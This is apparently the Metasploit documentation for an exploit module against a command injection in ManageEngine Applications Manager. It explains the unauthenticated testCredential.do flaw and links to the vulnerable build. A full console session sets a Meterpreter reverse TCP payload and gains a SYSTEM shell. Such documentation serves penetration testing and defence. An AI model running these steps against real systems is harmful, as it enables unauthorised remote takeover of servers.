documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
Vulnerable Application Installation Steps
Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. http://archives.manageengine.com/applications_manager/13630/
A successful check of the exploit will look like this:
msfconsoleuse exploit/windows/http/manageengine_appmanager_execRHOST <RHOST>PAYLOAD windows/meterpreter/reverse_tcpLHOST <LHOST>checkThe target is vulnerable. in console.exploitTriggering the vulnerability in console.Sending stage to <TARGET> in console.msf >
msf > use exploit/windows/http/manageengine_appmanager_exec
msf exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf exploit(windows/http/manageengine_appmanager_exec) > run
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Triggering the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM